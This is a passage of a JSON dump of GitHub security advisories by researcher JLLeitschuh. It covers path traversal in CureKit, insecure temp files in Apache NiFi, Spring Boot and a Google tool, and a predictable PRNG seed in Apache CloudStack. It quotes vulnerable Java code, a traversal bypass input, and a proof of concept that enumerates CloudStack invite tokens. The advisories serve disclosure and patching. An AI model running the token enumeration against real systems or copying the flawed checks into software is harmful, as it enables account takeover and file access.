"https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-hfmw-fx2m-jj4c", "cve_id": "CVE-2022-23082", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-hfmw-fx2m-jj4c", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-hfmw-fx2m-jj4c", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Partial Path Traversal') in io.whitesource:curekit", "description": "### Impact\r\n\r\n`io.whitesource.cure.FileSecurityUtils.isFileOutsideDir(String filePath, String baseDirPath)` incorrectly treats sibling of a root directory (`baseDirPath`) as inside the root directory. As such, `isFileOutsideDir` is an insufficient guard against partial-path traversal attacks.\r\n\r\n#### Vulnerability Root Cause\r\n\r\n```java\r\n public static boolean isFileOutsideDir(\r\n @NonNull final String filePath, @NonNull final String baseDirPath) throws IOException {\r\n File file = new File(filePath);\r\n File baseDir = new File(baseDirPath);\r\n return !file.getCanonicalPath().startsWith(baseDir.getCanonicalPath());\r\n }\r\n```\r\n\\- https://github.com/whitesource/CureKit/blob/d6ac3c382cb9d0b7a9f164eb3db1811d51f47c7c/src/main/java/io/whitesource/cure/FileSecurityUtils.java#L14-L26\r\n\r\nThe above bit of logic can be bypassed with the following payloads:\r\n```java\r\n// The following will return 'false', although the attacker controlled value `/usr/foo/../foo-bar/bar` will be outside the `/usr/foo` directory\r\nisFileOutsideDir(\"/usr/foo/../foo-bar/bar\", \"/usr/foo\")\r\n```\r\n\r\n#### True Root cause\r\n\r\n> If the result of `parent.getCanonicalPath()` is not slash terminated it allows for partial path traversal.\r\n>\r\n> Consider `\"/usr/outnot\".startsWith(\"/usr/out\")`. The check is bypassed although `outnot` is not under the `out` directory.\r\nThe terminating slash may be removed in various places. On Linux `println(new File(\"/var/\"))` returns `/var`, but `println(new File(\"/var\", \"/\"))` - `/var/`, however `println(new File(\"/var\", \"/\").getCanonicalPath())` - `/var`.\r\n> \\- [@JarLob (Jaroslav Lobačevski)](https://github.com/JarLob)\r\n\r\n### References\r\n\r\nSimilar vulnerabilities:\r\n - ESAPI (The OWASP Enterprise Security API) - https://nvd.nist.gov/vuln/detail/CVE-2022-23457", "severity": "critical", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-hfmw-fx2m-jj4c", "type": "GHSA" }, { "value": "CVE-2022-23082", "type": "CVE" } ], "state": "published", "created_at": "2022-05-11T17:06:09Z", "updated_at": "2023-02-27T19:41:51Z", "published_at": "2023-02-27T19:41:51Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "io.whitesource:curekit" }, "vulnerable_version_range": ">= 1.0.1, < 1.1.4", "patched_versions": "1.1.4", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 9.8 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-rvp4-r3g6-8hxq", "cve_id": "CVE-2022-26850", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-rvp4-r3g6-8hxq", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-rvp4-r3g6-8hxq", "summary": "Insufficiently Protected Credentials via Insecure Temporary File in org.apache.nifi:nifi-single-user-utils", "description": "### Impact\r\n\r\n`org.apache.nifi.authentication.single.user.writer.StandardLoginCredentialsWriter` contains a local information disclosure vulnerability due to writing credentials (username and password) to a file that is readable by all other users on unix-like systems. On unix-like systems, the system's temporary directory is shared between all users on that system. As such, files written to that directory without setting the correct file permissions can allow other users on that system to view the contents of the files written to those temporary files.\r\n\r\n### Source\r\n\r\nAn insecure temporary file is created here:\r\n - https://github.com/apache/nifi/blob/6a1c7c72d5b91b9ce5d5cb5b86e3155d21e2c19b/nifi-commons/nifi-single-user-utils/src/main/java/org/apache/nifi/authentication/single/user/writer/StandardLoginCredentialsWriter.java#L75\r\n\r\nThe username and password credentials are written to this file here:\r\n - https://github.com/apache/nifi/blob/6a1c7c72d5b91b9ce5d5cb5b86e3155d21e2c19b/nifi-commons/nifi-single-user-utils/src/main/java/org/apache/nifi/authentication/single/user/writer/StandardLoginCredentialsWriter.java#L85-L95\r\n\r\n### Patches\r\n\r\nThe vulnerability has been patched in version `1.16`.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n\r\n### References\r\n\r\n - https://issues.apache.org/jira/browse/NIFI-9785\r\n - https://github.com/apache/nifi/commit/859d5fe\r\n - https://github.com/apache/nifi/pull/5856\r\n - https://nifi.apache.org/security.html#CVE-2022-26850\r\n - https://twitter.com/JLLeitschuh/status/1511736635645435904?s=20&t=I3w3zF6Y2DUvWYsEFqERjg", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-rvp4-r3g6-8hxq", "type": "GHSA" }, { "value": "CVE-2022-26850", "type": "CVE" } ], "state": "published", "created_at": "2022-03-09T19:15:43Z", "updated_at": "2022-04-06T16:37:48Z", "published_at": "2022-04-06T15:53:54Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.apache.nifi:nifi-single-user-utils" }, "vulnerable_version_range": "<= 1.15.3", "patched_versions": "1.16", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "score": 6.5 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" }, { "cwe_id": "CWE-522", "name": "Insufficiently Protected Credentials" } ], "cwe_ids": [ "CWE-377", "CWE-522" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-cm59-pr5q-cw85", "cve_id": "CVE-2022-27772", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-cm59-pr5q-cw85", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85", "summary": "Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot", "description": "This was originally spotted by [@trugPa](https://github.com/trungPa) and communicated here: https://github.com/github/codeql/pull/4473#issuecomment-1030416237\r\n\r\n### Impact\r\n\r\nspring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method.\r\n\r\nThe vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation).\r\n\r\n#### Impact Location\r\n\r\nThis vulnerability impacted the following source location:\r\n\r\n```java\r\n\t/**\r\n\t * Return the absolute temp dir for given web server.\r\n\t * @param prefix server name\r\n\t * @return the temp dir for given server.\r\n\t */\r\n\tprotected final File createTempDir(String prefix) {\r\n\t\ttry {\r\n\t\t\tFile tempDir = File.createTempFile(prefix + \".\", \".\" + getPort());\r\n\t\t\ttempDir.delete();\r\n\t\t\ttempDir.mkdir();\r\n\t\t\ttempDir.deleteOnExit();\r\n\t\t\treturn tempDir;\r\n\t\t}\r\n```\r\n\\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177\r\n\r\nThis vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists:\r\n\r\n```java\r\nFile tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated\r\n// delete the file that was created\r\ntmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty.\r\n// and make a directory of the same name\r\n// SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory\r\ntmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown.\r\n// Attacker can write any new files to this directory that they wish.\r\n// Attacker can read any files created by this process.\r\n```\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nThis vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d\r\n\r\nThis vulnerability is patched in versions `v2.2.11.RELEASE` or later.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-cm59-pr5q-cw85", "type": "GHSA" }, { "value": "CVE-2022-27772", "type": "CVE" } ], "state": "published", "created_at": "2022-02-07T18:42:15Z", "updated_at": "2022-03-23T17:16:52Z", "published_at": "2022-02-16T00:05:08Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.springframework.boot:spring-boot" }, "vulnerable_version_range": "< v2.2.11.RELEASE", "patched_versions": "v2.2.11.RELEASE", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "score": 7.8 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" }, { "cwe_id": "CWE-379", "name": "Creation of Temporary File in Directory with Insecure Permissions" } ], "cwe_ids": [ "CWE-377", "CWE-379" ], "credits": [ { "login": "trungPa", "type": "analyst" }, { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "trungPa", "id": 17810017, "node_id": "MDQ6VXNlcjE3ODEwMDE3", "avatar_url": "https://avatars.githubusercontent.com/u/17810017?v=4", "gravatar_id": "", "url": "https://api.github.com/users/trungPa", "html_url": "https://github.com/trungPa", "followers_url": "https://api.github.com/users/trungPa/followers", "following_url": "https://api.github.com/users/trungPa/following{/other_user}", "gists_url": "https://api.github.com/users/trungPa/gists{/gist_id}", "starred_url": "https://api.github.com/users/trungPa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/trungPa/subscriptions", "organizations_url": "https://api.github.com/users/trungPa/orgs", "repos_url": "https://api.github.com/users/trungPa/repos", "events_url": "https://api.github.com/users/trungPa/events{/privacy}", "received_events_url": "https://api.github.com/users/trungPa/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" }, { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-vpcc-9rh2-8jfp", "cve_id": "CVE-2022-26779", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-vpcc-9rh2-8jfp", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-vpcc-9rh2-8jfp", "summary": "apache/cloudstack: Privileged escalation due to Predictable Seed in Pseudo-Random Number Generator (PRNG) and Use of Insufficiently Random Values", "description": "### Impact\r\n\r\nApache Cloudstack contains a privileged escalation vulnerability in the invite to project logic due to a predictable seed used in a PRNG.\r\n\r\n\r\n### Details\r\n\r\nWhen inviting a user or account to a project via the email, the methods `ProjectManagerImpl.inviteAccountToProject` or `ProjectManagerImpl.inviteUserToProject` are invoked, and a random token is emailed to the invitee to allow them to join the project.\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L849-L873\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L875-L895\r\n\r\nHowever, this random token is generated predictably using the method `generateToken` with the value of `10` using `System.currentTimeMillis()` as the seed for the random number generator.\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1350-L1359\r\n ```java\r\n public static String generateToken(int length) {\r\n String charset = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\";\r\n Random rand = new Random(System.currentTimeMillis());\r\n StringBuffer sb = new StringBuffer();\r\n for (int i = 0; i < length; i++) {\r\n int pos = rand.nextInt(charset.length());\r\n sb.append(charset.charAt(pos));\r\n }\r\n return sb.toString();\r\n }\r\n ```\r\n\r\nAs such, if an attacker knows around the time an invite was generated to invite another user, that attacker would be able to leverage the invite token to impersonate the invited user's invite acceptance.\r\n\r\nThe invite is stored in the database, but other than \"having the secret token\" there is no further checks that occur to ensure that the user taking advantage of the token is the user that the token was assigned to.\r\n\r\nThe site where the project invite is looked up form the database:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1202\r\nNotice how the account of the current user making the request isn't included in the lookup.\r\n\r\nThe user that is the current caller is pulled from the request here:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1189-L1190\r\n\r\nThen, that accepted invite is assigned to the calling user here:\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1234\r\n - https://github.com/apache/cloudstack/blob/f15cab16dab1fc6ae6576f9e5a6a3a1eec76e5a1/server/src/main/java/com/cloud/projects/ProjectManagerImpl.java#L1241\r\n\r\nAs such, an attacker is able to leverage an invite a project that they were never sent because they can compute the value of the invite token.\r\n\r\n\r\n### Proof Of Concept\r\n\r\nThe following code will print out all of the possible secret tokens for the next hour:\r\n\r\n```java\r\npublic static String generateToken(long time, int length) {\r\n String charset = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\";\r\n Random rand = new Random(time);\r\n StringBuffer sb = new StringBuffer();\r\n for (int i = 0; i < length; i++) {\r\n int pos = rand.nextInt(charset.length());\r\n sb.append(charset.charAt(pos));\r\n }\r\n return sb.toString();\r\n}\r\n\r\npublic static void main(String[] args) {\r\n long startTime = System.currentTimeMillis();\r\n LongStream\r\n .rangeClosed(startTime + 0, startTime + (long) (3_600_000))\r\n .parallel()\r\n .mapToObj(time -> generateToken(time, 10))\r\n .forEach(System.out::println);\r\n}\r\n```\r\n\r\n### Patches\r\n\r\n - https://github.com/apache/cloudstack/commit/3fc4ef478d03cd20169d5a3dcdef6233724446be\r\n\r\n### Workarounds\r\n\r\nWhen executing the `addAccountToProject` API call, don't invite by email. Only invite by existing account or user.\r\n\r\n### Mitigating Factors\r\n\r\n`project.invite.required` is false by default and is something that must be enabled by end-users explicitly.\r\n\r\n### References\r\n\r\n - https://owasp.org/www-community/vulnerabilities/Insecure_Randomness\r\n\r\n### For more information\r\n\r\nOpen an issue with the Apache Cloudstack team here: https://github.com/apache/cloudstack/issues\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-vpcc-9rh2-8jfp", "type": "GHSA" }, { "value": "CVE-2022-26779", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T23:10:24Z", "updated_at": "2022-03-14T14:46:40Z", "published_at": "2022-03-10T17:04:18Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "none", "name": "apache/cloudstack" }, "vulnerable_version_range": "<= 4.16.0.0", "patched_versions": "4.16.1.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L", "score": 6.7 }, "cwes": [ { "cwe_id": "CWE-330", "name": "Use of Insufficiently Random Values" }, { "cwe_id": "CWE-337", "name": "Predictable Seed in Pseudo-Random Number Generator (PRNG)" } ], "cwe_ids": [ "CWE-330", "CWE-337" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7fjx-657r-9r5h", "cve_id": "CVE-2021-22571", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7fjx-657r-9r5h", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7fjx-657r-9r5h", "summary": "Insecure Temporary File in google / sa360-webquery-bigquery", "description": "### CVE Status\r\n\r\nCVE is pending via the CVE Appeals process with MITRE\r\n\r\n### Impact\r\n\r\n`TransferRunner` may disclose information to other users from WebQuery CSV report.\r\n\r\n### Patches\r\n\r\nVersion `v1.0.3` and higher is patched.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Workarounds\r\n\r\nIf you are unable to update: setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n\r\n### References\r\n\r\n - https://github.com/google/sa360-webquery-bigquery/issues/14\r\n\r\nFix:\r\n - https://github.com/google/sa360-webquery-bigquery/commit/4926b5bf0e4be88f7a09badd145c50fa8a95e1cc#diff-4169b705389b36efbde7d57ec27a1ad2aa21c4385d2e535ee8354f79f03ae756L56\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": 